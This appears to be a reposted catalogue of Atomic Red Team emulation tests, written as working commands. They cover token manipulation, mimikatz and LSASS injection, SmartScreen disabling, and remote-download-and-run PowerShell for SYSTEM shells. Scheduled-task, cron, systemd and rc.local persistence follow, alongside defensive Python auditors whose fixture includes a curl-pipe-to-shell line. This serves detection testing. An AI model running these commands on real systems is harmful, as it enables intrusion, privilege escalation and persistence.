reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f


LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -POWERSHELL

New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -PropertyType String -Value Block -Force

--------------------------------------------------------------------------------


T1134.005

ACCESS TOKEN MANIPULATION: SID-HISTORY INJECTION

 * Atomic Test #1 - Injection SID-History with mimikatz


INJECTION SID-HISTORY WITH MIMIKATZ

#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"

--------------------------------------------------------------------------------


T1134.004

ACCESS TOKEN MANIPULATION: PARENT PID SPOOFING

 * Atomic Test #1 - Parent PID Spoofing using PowerShell

 * Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process

 * Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process

 * Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe

 * Atomic Test #5 - Parent PID Spoofing - Spawn from New Process


PARENT PID SPOOFING USING POWERSHELL

. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"


PARENT PID SPOOFING - SPAWN FROM CURRENT PROCESS

Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}


PARENT PID SPOOFING - SPAWN FROM SPECIFIED PROCESS

Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid #{test_guid}


PARENT PID SPOOFING - SPAWN FROM SVCHOST.EXE

Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'


PARENT PID SPOOFING - SPAWN FROM NEW PROCESS

Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'

--------------------------------------------------------------------------------


T1134.002

CREATE PROCESS WITH TOKEN

 * Atomic Test #1 - Access Token Manipulation

 * Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token
   Manipulation technique


ACCESS TOKEN MANIPULATION

Set-ExecutionPolicy -Scope Process Bypass -Force
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")


WINPWN - GET SYSTEM SHELL - POP SYSTEM SHELL USING TOKEN MANIPULATION TECHNIQUE

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem

--------------------------------------------------------------------------------


T1134.001

ACCESS TOKEN MANIPULATION: TOKEN IMPERSONATION/THEFT

 * Atomic Test #1 - Named pipe client impersonation

 * Atomic Test #2 - SeDebugPrivilege token duplication

 * Atomic Test #3 - Launch NSudo Executable

 * Atomic Test #4 - Bad Potato


NAMED PIPE CLIENT IMPERSONATION

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose


SEDEBUGPRIVILEGE TOKEN DUPLICATION

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose


LAUNCH NSUDO EXECUTABLE

Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue


BAD POTATO

cd PathToAtomicsFolder\..\ExternalPayloads
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue

--------------------------------------------------------------------------------


T1055

PROCESS INJECTION

 * Atomic Test #1 - Shellcode execution via VBA

 * Atomic Test #2 - Remote Process Injection in LSASS via mimikatz

 * Atomic Test #3 - Section View Injection


SHELLCODE EXECUTION VIA VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"


REMOTE PROCESS INJECTION IN LSASS VIA MIMIKATZ

#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"


SECTION VIEW INJECTION

$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe

--------------------------------------------------------------------------------


T1055.012

PROCESS INJECTION: PROCESS HOLLOWING

 * Atomic Test #1 - Process Hollowing using PowerShell

 * Atomic Test #2 - RunPE via VBA


PROCESS HOLLOWING USING POWERSHELL

. $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose


RUNPE VIA VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"

--------------------------------------------------------------------------------


T1055.004

PROCESS INJECTION: ASYNCHRONOUS PROCEDURE CALL

 * Atomic Test #1 - Process Injection via C#


PROCESS INJECTION VIA C#

PathToAtomicsFolder\T1055.004\bin\T1055.exe

--------------------------------------------------------------------------------


T1055.003

THREAD EXECUTION HIJACKING

 * Atomic Test #1 - Thread Execution Hijacking


THREAD EXECUTION HIJACKING

$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055.003\bin\InjectContext.exe
Start-Sleep -Seconds 5
Stop-Process $notepad.id

--------------------------------------------------------------------------------


T1055.001

PROCESS INJECTION: DYNAMIC-LINK LIBRARY INJECTION

 * Atomic Test #1 - Process Injection via mavinject.exe

 * Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using
   UsoClient DLL load technique


PROCESS INJECTION VIA MAVINJECT.EXE

$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
Stop-Process -processname notepad


WINPWN - GET SYSTEM SHELL - BIND SYSTEM SHELL USING USOCLIENT DLL LOAD TECHNIQUE

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')

--------------------------------------------------------------------------------


T1053.007

KUBERNETES CRONJOB

 * Atomic Test #1 - ListCronjobs

 * Atomic Test #2 - CreateCronjob


LISTCRONJOBS

kubectl get cronjobs -n #{namespace}


CREATECRONJOB

kubectl create -f src/cronjob.yaml -n #{namespace}
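kubectl create -f accepts JSON as well as YAML, and what puts a CronJob under privilege escalation is what its pod template is allowed to do, not its schedule. The audit below is an added example and not the cronjob.yaml that Atomic Red Team ships (its contents are not reproduced here): it walks a CronJob manifest down to the pod spec and reports the settings that turn a scheduled job into a node-level foothold. The manifest it runs on is constructed.

```python
"""Audit a Kubernetes CronJob manifest for privilege-escalation settings.
Added example; the manifest below is constructed, not the one from the
Atomic Red Team repository."""
import json

DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN", "SYS_MODULE"}


def pod_spec_of(manifest):
    """CronJob -> JobTemplate -> PodTemplate -> PodSpec."""
    if manifest.get("kind") != "CronJob":
        raise ValueError("expected kind: CronJob, got %r" % manifest.get("kind"))
    return manifest["spec"]["jobTemplate"]["spec"]["template"]["spec"]


def audit_cronjob(manifest):
    """Return a list of human-readable findings; empty means nothing notable."""
    spec = pod_spec_of(manifest)
    findings = []
    # Sharing the node's PID/network/IPC namespaces is a direct path to the host.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{flag}=true")
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"container {c['name']}: privileged")
        added = set((sc.get("capabilities") or {}).get("add", []))
        if added & DANGEROUS_CAPS:
            findings.append(f"container {c['name']}: adds {sorted(added & DANGEROUS_CAPS)}")
    # hostPath volumes expose the node filesystem (e.g. "/" or the kubelet dirs).
    for v in spec.get("volumes", []):
        if "hostPath" in v:
            findings.append(f"hostPath mount: {v['hostPath'].get('path')}")
    # A non-default service account usually exists precisely because it has RBAC.
    sa = spec.get("serviceAccountName", "default")
    if sa != "default" and spec.get("automountServiceAccountToken", True):
        findings.append(f"serviceAccountName={sa} with token mounted")
    return findings


# Constructed manifest: a minutely job that mounts the node root filesystem
# into a privileged container sharing the host PID namespace.
SAMPLE_CRONJOB = json.loads("""
{
  "apiVersion": "batch/v1", "kind": "CronJob",
  "metadata": {"name": "atomic-cronjob"},
  "spec": {
    "schedule": "* * * * *",
    "jobTemplate": {"spec": {"template": {"spec": {
      "hostPID": true,
      "restartPolicy": "Never",
      "containers": [{
        "name": "shell", "image": "busybox",
        "command": ["sh", "-c", "chroot /host /bin/sh -c id"],
        "securityContext": {"privileged": true},
        "volumeMounts": [{"name": "root", "mountPath": "/host"}]
      }],
      "volumes": [{"name": "root", "hostPath": {"path": "/"}}]
    }}}}
  }
}
""")

if __name__ == "__main__":
    for f in audit_cronjob(SAMPLE_CRONJOB):
        print("finding:", f)
```

The same function works on live objects: `kubectl get cronjobs -A -o json` returns a List whose `items` are CronJob manifests in exactly this shape, so the listing test above and this audit fit together.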

--------------------------------------------------------------------------------


T1053.006

SCHEDULED TASK/JOB: SYSTEMD TIMERS

 * Atomic Test #1 - Create Systemd Service and Timer

 * Atomic Test #2 - Create a user level transient systemd service and timer

 * Atomic Test #3 - Create a system level transient systemd service and timer


CREATE SYSTEMD SERVICE AND TIMER

echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
systemctl daemon-reload
systemctl enable #{systemd_timer_name}
systemctl start #{systemd_timer_name}


CREATE A USER LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER

systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'


CREATE A SYSTEM LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER

systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'

--------------------------------------------------------------------------------


T1053.005

SCHEDULED TASK/JOB: SCHEDULED TASK

 * Atomic Test #1 - Scheduled Task Startup Script

 * Atomic Test #2 - Scheduled task Local

 * Atomic Test #3 - Scheduled task Remote

 * Atomic Test #4 - Powershell Cmdlet Scheduled Task

 * Atomic Test #5 - Task Scheduler via VBA

 * Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task

 * Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From
   Registry

 * Atomic Test #8 - Import XML Schedule Task with Hidden Attribute

 * Atomic Test #9 - PowerShell Modify A Scheduled Task


SCHEDULED TASK STARTUP SCRIPT

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"


SCHEDULED TASK LOCAL

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}


SCHEDULED TASK REMOTE

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}


POWERSHELL CMDLET SCHEDULED TASK

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object


TASK SCHEDULER VIA VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"


WMI INVOKE-CIMMETHOD SCHEDULED TASK

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }


SCHEDULED TASK EXECUTING BASE64 ENCODED COMMANDS FROM REGISTRY

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}


IMPORT XML SCHEDULE TASK WITH HIDDEN ATTRIBUTE

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }


POWERSHELL MODIFY A SCHEDULED TASK

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
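Tests #6 and #8 register a task straight from XML, and that is also the form a defender gets back afterwards: C:\Windows\System32\Tasks\<name> holds the same document, and `schtasks /Query /TN <name> /XML` prints it. The checker below is an added example, not Atomic Red Team code. It parses a task definition against the 2004/02 task schema and reports a hidden task, a SYSTEM or Administrators principal at highest run level, and an action whose arguments carry a decodable base64 payload like the one test #7 plants in the registry. Both task definitions it runs on are constructed (real task files start with a UTF-16 XML declaration; read those as bytes before handing them to the parser).

```python
"""Audit a Task Scheduler XML definition for privilege/evasion markers.
Added example; the two task definitions below are constructed."""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
INDIRECT = re.compile(r"FromBase64String|-enc(odedcommand)?\b|\bIEX\b|Invoke-Expression", re.I)


def _text(node, path):
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def try_decode(token):
    """Decode a base64 token only if it yields printable ASCII, either directly
    (FromBase64String + ASCII.GetString) or as UTF-16LE (-EncodedCommand).
    ASCII is tried first: UTF-16LE would turn plain ASCII bytes into CJK text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None
    for enc in ("ascii", "utf-16-le"):
        try:
            s = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if s and all(32 <= ord(ch) < 127 for ch in s):
            return s
    return None


def audit_task_xml(xml_text):
    root = ET.fromstring(xml_text)
    findings = []
    if _text(root, "t:Settings/t:Hidden").lower() == "true":
        findings.append("hidden task")
    for p in root.findall("t:Principals/t:Principal", NS):
        uid, gid = _text(p, "t:UserId"), _text(p, "t:GroupId")
        if uid.upper() in SYSTEM_IDS or gid.upper().endswith("ADMINISTRATORS"):
            findings.append(f"runs as {uid or gid}")
        if _text(p, "t:RunLevel") == "HighestAvailable":
            findings.append("RunLevel=HighestAvailable")
    for ex in root.findall("t:Actions/t:Exec", NS):
        line = f"{_text(ex, 't:Command')} {_text(ex, 't:Arguments')}".strip()
        for m in B64_TOKEN.finditer(line):
            decoded = try_decode(m.group(0))
            if decoded:
                findings.append(f"base64 payload: {decoded}")
        if INDIRECT.search(line):
            findings.append(f"indirect/encoded command: {line}")
    return findings


# Constructed: a hidden SYSTEM task whose action mirrors test #7's command line.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>cmd</Command>
    <Arguments>/c start /min "" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('cGluZyAxMjcuMC4wLjE=')))</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed: an ordinary per-user task for comparison.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>CORP\\alice</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>notepad.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for f in audit_task_xml(SUSPICIOUS_TASK):
        print("finding:", f)
```

The registry indirection of test #7 is what makes the ASCII/UTF-16 ordering matter: the stored string is decoded with ASCII.GetString, while a `-EncodedCommand` argument is UTF-16LE, and trying UTF-16LE first would mis-read the former as printable CJK text.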

--------------------------------------------------------------------------------


T1053.003

SCHEDULED TASK/JOB: CRON

 * Atomic Test #1 - Cron - Replace crontab with referenced file

 * Atomic Test #2 - Cron - Add script to all cron subfolders

 * Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder


CRON - REPLACE CRONTAB WITH REFERENCED FILE

crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}


CRON - ADD SCRIPT TO ALL CRON SUBFOLDERS

echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}


CRON - ADD SCRIPT TO /VAR/SPOOL/CRON/CRONTABS/ FOLDER

echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
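One audit for the Linux persistence that the three cron tests above and the systemd timer tests under T1053.006 leave behind, added here as an example and not Atomic Red Team code. It parses user crontab lines, checks whether a drop-in file name is one run-parts will actually execute, and reads a service/timer pair for ExecStart and OnCalendar. The crontab, the drop-in names and the unit texts are constructed; the units mirror the ones the T1053.006 test writes with echo. One caveat the "add script to all cron subfolders" test runs into: on Debian-derived systems cron invokes run-parts without --lsbsysinit, and it then executes only names matching [A-Za-z0-9_-]+, so a #{cron_script_name} containing a dot (evil.sh) is silently skipped; the name check below exposes that both for the tester and for a defender who expects every file in /etc/cron.daily to run.

```python
"""Audit cron and systemd-timer persistence. Added example; the crontab text,
drop-in names and unit files below are constructed (the units mirror the ones
written in the T1053.006 test above)."""
import re
from configparser import ConfigParser

USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
EVERY_MINUTE = {"*-*-* *:*:00", "*:0/1", "minutely"}
PAYLOAD = re.compile(r"base64|/dev/tcp/|(curl|wget)\b.*\|\s*(ba)?sh\b")
# Debian run-parts (as cron invokes it) only executes names matching this.
RUN_PARTS_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def audit_crontab(text):
    """Return (schedule, command, reasons) for each notable crontab line."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue
            sched, cmd = parts
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            sched, cmd = " ".join(fields[:5]), fields[5]
        reasons = []
        if sched in ("* * * * *", "@reboot"):
            reasons.append("runs every minute / at boot")
        if any(d in cmd for d in USER_WRITABLE):
            reasons.append("command in user-writable dir")
        if PAYLOAD.search(cmd):
            reasons.append("download-and-run / encoded payload")
        if reasons:
            out.append((sched, cmd, reasons))
    return out


def run_parts_will_execute(name):
    """True if Debian's run-parts would run a file of this name in cron.*/."""
    return RUN_PARTS_NAME.match(name) is not None


def _unit(text):
    # systemd units are INI-like; keys are case-sensitive and may repeat.
    cp = ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_timer(service_text, timer_text):
    """Return (ExecStart, OnCalendar, reasons) for a service/timer pair."""
    exec_start = _unit(service_text).get("Service", "ExecStart", fallback="")
    calendar = _unit(timer_text).get("Timer", "OnCalendar", fallback="")
    reasons = []
    if calendar in EVERY_MINUTE:
        reasons.append("fires every minute")
    if any(d in exec_start for d in USER_WRITABLE):
        reasons.append("ExecStart touches user-writable dir")
    if re.search(r"\bsh -c\b", exec_start) or PAYLOAD.search(exec_start):
        reasons.append("shell wrapper / encoded payload")
    return exec_start, calendar, reasons


# Constructed inputs.
SAMPLE_CRONTAB = """MAILTO=root
# nightly backup
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/.x/run.sh
@reboot curl -s http://198.51.100.7/a | sh
"""
SAMPLE_SERVICE = """[Unit]
Description=Atomic Red Team Systemd Timer Service
[Service]
Type=simple
ExecStart=/bin/touch /tmp/art-systemd-timer-marker
[Install]
WantedBy=multi-user.target
"""
SAMPLE_TIMER = """[Unit]
Description=Executes Atomic Red Team Systemd Timer Service
Requires=art-timer.service
[Timer]
Unit=art-timer.service
OnCalendar=*-*-* *:*:00
[Install]
WantedBy=timers.target
"""

if __name__ == "__main__":
    for sched, cmd, why in audit_crontab(SAMPLE_CRONTAB):
        print(f"cron  {sched!r} {cmd}: {', '.join(why)}")
    print("timer", audit_timer(SAMPLE_SERVICE, SAMPLE_TIMER))
```

To run it on a live host feed it `crontab -l -u <user>` output, the file names from /etc/cron.{hourly,daily,weekly,monthly}, and the unit texts from `systemctl cat <timer>` and its service; transient units created with systemd-run live under /run/systemd/transient/ and show up in `systemctl list-timers --all`.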

--------------------------------------------------------------------------------


T1053.002

SCHEDULED TASK/JOB: AT

 * Atomic Test #1 - At.exe Scheduled task

 * Atomic Test #2 - At - Schedule a job


AT.EXE SCHEDULED TASK

at 13:20 /interactive cmd


AT - SCHEDULE A JOB

echo "#{at_command}" | at #{time_spec}

--------------------------------------------------------------------------------


T1037.005

BOOT OR LOGON INITIALIZATION SCRIPTS: STARTUP ITEMS

 * Atomic Test #1 - Add file to Local Library StartupItems


ADD FILE TO LOCAL LIBRARY STARTUPITEMS

sudo touch /Library/StartupItems/EvilStartup.plist

--------------------------------------------------------------------------------


T1037.004

BOOT OR LOGON INITIALIZATION SCRIPTS: RC.COMMON

 * Atomic Test #1 - rc.common

 * Atomic Test #2 - rc.common

 * Atomic Test #3 - rc.local


RC.COMMON 1

echo "osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"'" | sudo tee -a /etc/rc.common


RC.COMMON 2

filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common


RC.LOCAL

filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local

--------------------------------------------------------------------------------


T1037.002

BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (MAC)

 * Atomic Test #1 - Logon Scripts - Mac


LOGON SCRIPTS - MAC

1. Create the required plist file
    
    sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
    
2. Populate the plist with the location of your shell script
    
    sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
    
3. Create the required plist file in the target user's Preferences directory
    
    touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
    
4. Populate the plist with the location of your shell script
    
    defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh

--------------------------------------------------------------------------------


T1037.001

BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (WINDOWS)

 * Atomic Test #1 - Logon Scripts


LOGON SCRIPTS

echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f

Category: Security
Tags: Att&ck, Security
Posted 2023-06-28 13:53 by 皇帽讲绿帽带法技巧